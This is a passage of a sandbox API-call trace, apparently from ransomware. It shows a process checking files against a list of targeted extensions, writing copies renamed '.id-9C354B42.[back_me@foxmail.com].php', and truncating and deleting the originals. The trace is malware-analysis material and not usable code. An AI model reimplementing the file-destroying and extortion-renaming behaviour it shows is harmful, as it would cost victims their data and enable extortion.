office\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0056.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.527] lstrlenW (lpString=".doc") returned 4 [0056.527] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.527] lstrlenW (lpString=".docx") returned 5 [0056.527] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.527] lstrlenW (lpString=".pdf") returned 4 [0056.527] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.527] lstrlenW (lpString=".xls") returned 4 [0056.527] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.527] lstrlenW (lpString=".xlsx") returned 5 [0056.527] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.527] lstrlenW (lpString=".ppt") returned 4 [0056.527] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.528] lstrlenW (lpString=".zip") returned 4 [0056.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.528] lstrlenW (lpString=".rar") returned 4 [0056.528] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.528] lstrlenW (lpString=".bz2") returned 4 [0056.528] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.528] lstrlenW (lpString=".7z") returned 3 [0056.528] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.528] lstrlenW (lpString=".dbf") returned 4 [0056.528] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.528] lstrlenW (lpString=".1cd") returned 4 [0056.528] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0056.528] lstrlenW (lpString=".jpg") returned 4 [0056.528] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.528] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.528] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.529] GetLastError () returned 0x0 [0056.529] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xc48, lpOverlapped=0x0) returned 1 [0056.930] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xc50, lpOverlapped=0x0) returned 1 [0056.931] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.931] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.931] SetEndOfFile (hFile=0x204) Thread: id = 13 os_tid = 0x9a8 [0033.855] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2e70068 [0033.855] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2e80070 [0033.855] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f48 [0033.855] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xbf8d48 [0033.855] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f60 [0033.855] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x3d60020 [0033.856] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f78 [0033.856] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7f78, Size=0x20) returned 0xb90220 [0033.856] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f78 [0033.856] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7f78, Size=0x20) returned 0xb901f8 [0033.856] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.856] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.856] Wow64DisableWow64FsRedirection (in: OldValue=0x342ff58 | out: OldValue=0x342ff58*=0x0) returned 1 [0033.856] lstrlenW (lpString="kernel32.dll") returned 12 [0033.856] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90220 | out: hHeap=0xb10000) returned 1 [0033.856] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.856] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb901f8 | out: hHeap=0xb10000) returned 1 [0033.856] Sleep (dwMilliseconds=0x64) [0034.547] lstrcmpiW (lpString1=".BAK", lpString2=".php") returned -1 [0034.547] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0034.547] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.575] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=8192) returned 1 [0034.575] CloseHandle (hObject=0x15c) returned 1 [0034.575] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0034.575] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\bootsect.bak.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.575] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0034.575] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.575] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.576] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.576] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\bootsect.bak.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.576] GetLastError () returned 0x0 [0034.576] ReadFile (in: hFile=0x15c, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x2000, lpOverlapped=0x0) returned 1 [0034.590] WriteFile (in: hFile=0x160, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x2010, lpOverlapped=0x0) returned 1 [0034.591] ReadFile (in: hFile=0x15c, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.591] WriteFile (in: hFile=0x160, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.591] SetEndOfFile (hFile=0x160) returned 1 [0034.591] CloseHandle (hObject=0x160) returned 1 [0034.592] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.592] SetEndOfFile (hFile=0x15c) returned 1 [0034.593] CloseHandle (hObject=0x15c) returned 1 [0034.593] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x27) returned 1 [0034.593] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0034.593] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.593] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.593] lstrlenW (lpString=".doc") returned 4 [0034.593] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0034.593] lstrlenW (lpString=".docx") returned 5 [0034.593] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0034.593] lstrlenW (lpString=".pdf") returned 4 [0034.593] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0034.593] lstrlenW (lpString=".xls") returned 4 [0034.593] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0034.593] lstrlenW (lpString=".xlsx") returned 5 [0034.594] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0034.594] lstrlenW (lpString=".ppt") returned 4 [0034.594] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.594] lstrlenW (lpString=".zip") returned 4 [0034.594] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString=".rar") returned 4 [0034.594] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString=".bz2") returned 4 [0034.594] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString=".7z") returned 3 [0034.594] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0034.594] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.594] lstrlenW (lpString=".dbf") returned 4 [0034.594] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.594] lstrlenW (lpString=".1cd") returned 4 [0034.594] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0034.594] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.594] lstrlenW (lpString=".jpg") returned 4 [0034.594] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.594] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.594] lstrlenW (lpString=".doc") returned 4 [0034.594] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString=".docx") returned 5 [0034.594] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0034.594] lstrlenW (lpString=".pdf") returned 4 [0034.594] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString=".xls") returned 4 [0034.594] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0034.594] lstrlenW (lpString=".xlsx") returned 5 [0034.594] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0034.595] lstrlenW (lpString=".ppt") returned 4 [0034.595] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0034.595] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.595] lstrlenW (lpString=".zip") returned 4 [0034.595] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0034.595] lstrlenW (lpString=".rar") returned 4 [0034.595] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0034.595] lstrlenW (lpString=".bz2") returned 4 [0034.595] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0034.595] lstrlenW (lpString=".7z") returned 3 [0034.595] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0034.595] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.595] lstrlenW (lpString=".dbf") returned 4 [0034.595] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0034.595] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.595] lstrlenW (lpString=".1cd") returned 4 [0034.595] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0034.595] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.595] lstrlenW (lpString=".jpg") returned 4 [0034.595] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0034.595] Sleep (dwMilliseconds=0x64) [0034.801] Sleep (dwMilliseconds=0x64) [0034.960] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.960] lstrlenW (lpString="OutlookMUI.xml") returned 14 [0034.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.961] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=3186) returned 1 [0034.961] CloseHandle (hObject=0x188) returned 1 [0034.961] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020 [0034.961] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.962] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.962] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.962] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.962] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.962] GetLastError () returned 0x0 [0034.962] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xc72, lpOverlapped=0x0) returned 1 [0034.963] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xc80, lpOverlapped=0x0) returned 1 [0034.964] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.964] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.965] SetEndOfFile (hFile=0x18c) returned 1 [0034.965] CloseHandle (hObject=0x18c) returned 1 [0034.965] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.965] SetEndOfFile (hFile=0x188) returned 1 [0034.966] CloseHandle (hObject=0x188) returned 1 [0034.966] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.967] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0034.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.967] lstrlenW (lpString=".doc") returned 4 [0034.967] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.967] lstrlenW (lpString=".docx") returned 5 [0034.967] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.967] lstrlenW (lpString=".pdf") returned 4 [0034.967] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.967] lstrlenW (lpString=".xls") returned 4 [0034.967] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.967] lstrlenW (lpString=".xlsx") returned 5 [0034.967] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.967] lstrlenW (lpString=".ppt") returned 4 [0034.967] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.967] lstrlenW (lpString=".zip") returned 4 [0034.967] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.967] lstrlenW (lpString=".rar") returned 4 [0034.967] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.967] lstrlenW (lpString=".bz2") returned 4 [0034.967] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.967] lstrlenW (lpString=".7z") returned 3 [0034.967] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.968] lstrlenW (lpString=".dbf") returned 4 [0034.968] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.968] lstrlenW (lpString=".1cd") returned 4 [0034.968] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.968] lstrlenW (lpString=".jpg") returned 4 [0034.968] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.968] lstrlenW (lpString=".doc") returned 4 [0034.968] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString=".docx") returned 5 [0034.968] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.968] lstrlenW (lpString=".pdf") returned 4 [0034.968] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString=".xls") returned 4 [0034.968] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString=".xlsx") returned 5 [0034.968] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.968] lstrlenW (lpString=".ppt") returned 4 [0034.968] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.968] lstrlenW (lpString=".zip") returned 4 [0034.968] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.968] lstrlenW (lpString=".rar") returned 4 [0034.968] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString=".bz2") returned 4 [0034.968] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.968] lstrlenW (lpString=".7z") returned 3 [0034.968] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.969] lstrlenW (lpString=".dbf") returned 4 [0034.969] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.969] lstrlenW (lpString=".1cd") returned 4 [0034.969] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.969] lstrlenW (lpString=".jpg") returned 4 [0034.969] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.969] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.969] lstrlenW (lpString="Setup.xml") returned 9 [0034.969] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.969] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=4207) returned 1 [0034.969] CloseHandle (hObject=0x188) returned 1 [0034.969] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.969] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.969] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.970] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.970] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.970] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.970] GetLastError () returned 0x0 [0034.970] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x106f, lpOverlapped=0x0) returned 1 [0034.971] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x1070, lpOverlapped=0x0) returned 1 [0034.972] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.972] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.973] SetEndOfFile (hFile=0x18c) returned 1 [0034.973] CloseHandle (hObject=0x18c) returned 1 [0034.973] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.973] SetEndOfFile (hFile=0x188) returned 1 [0034.974] CloseHandle (hObject=0x188) returned 1 [0034.974] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.974] DeleteFileW (lpFileName="C:\\MSOCache\\All 